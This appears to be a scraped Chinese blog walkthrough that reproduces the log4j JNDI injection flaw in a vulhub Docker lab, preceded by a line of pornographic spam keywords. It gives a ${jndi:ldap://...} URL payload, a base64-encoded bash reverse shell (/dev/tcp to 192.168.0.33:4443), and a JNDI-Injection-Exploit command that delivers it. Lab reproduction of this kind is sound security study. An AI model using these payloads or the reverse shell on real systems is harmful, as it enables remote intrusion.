欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

目錄

柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化

柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化

http://yzkb.51969.com/

1.環(huán)境搭建

一臺(tái)kali(靶機(jī)) 一臺(tái)win(攻擊機(jī))

這里kali進(jìn)行換源

# 官方源 # deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib #根據(jù)需要自己選一個(gè),中科大的還可以 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清華大學(xué) #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙大 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #東軟大學(xué) #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #重慶大學(xué) #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

?進(jìn)入/etc/apt目錄 編輯sources.list文件命令如下

sudo vim sources.list

?將原有的源注釋,添加其他源,這里用的是阿里的

?隨后進(jìn)行更新

apt-get update 更新索引

apt-get upgrade 更新軟件

apt-get dist-upgrade 升級(jí)

apt-get clean 刪除緩存包

apt-get autoclean 刪除未安裝的deb包 普通用戶記得在命令前接上sudo

kali機(jī)安裝docker命令如下

?sudo apt install docker.io root用戶不用加sudo

?安裝docker-compose

sudo apt-get install docker-compose

安裝靶場(chǎng)vulhub

git clone https://github.com/vulhub/vulhub.git

?啟動(dòng)靶場(chǎng)環(huán)境

進(jìn)入靶場(chǎng) cd /vulhub/log4j/你所想打的對(duì)應(yīng)版本 啟動(dòng) docker-compose up -d 查看容器開放端口 docker ps 訪問(wèn)靶場(chǎng),ip加端口訪問(wèn)

?漏洞復(fù)現(xiàn)

?將以下代碼放入url

admin/cores?action=${jndi:ldap://uhd50l.dnslog.cn}

下載工具 JNDI-Injection-Exploit

?Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub

?構(gòu)建反彈shell要經(jīng)過(guò)base64編碼

原碼 bash -i >& /dev/tcp/192.168.0.33/4443 0>&1 編碼后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzkvNDQ0MyAwPiYx

利用JNDI-Injection-Exploit v1.0生成payload

?java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzMvNDQ0MyAwPiYx}|{base64,-d}|{bash,- i}" -A 192.168.0.33

?

?發(fā)包

柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化

http://yzkb.51969.com/

參考鏈接

評(píng)論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點(diǎn)和立場(chǎng)。

轉(zhuǎn)載請(qǐng)注明,如有侵權(quán),聯(lián)系刪除。

本文鏈接:http://gantiao.com.cn/post/19027667.html

發(fā)布評(píng)論

您暫未設(shè)置收款碼

請(qǐng)?jiān)谥黝}配置——文章設(shè)置里上傳

掃描二維碼手機(jī)訪問(wèn)

文章目錄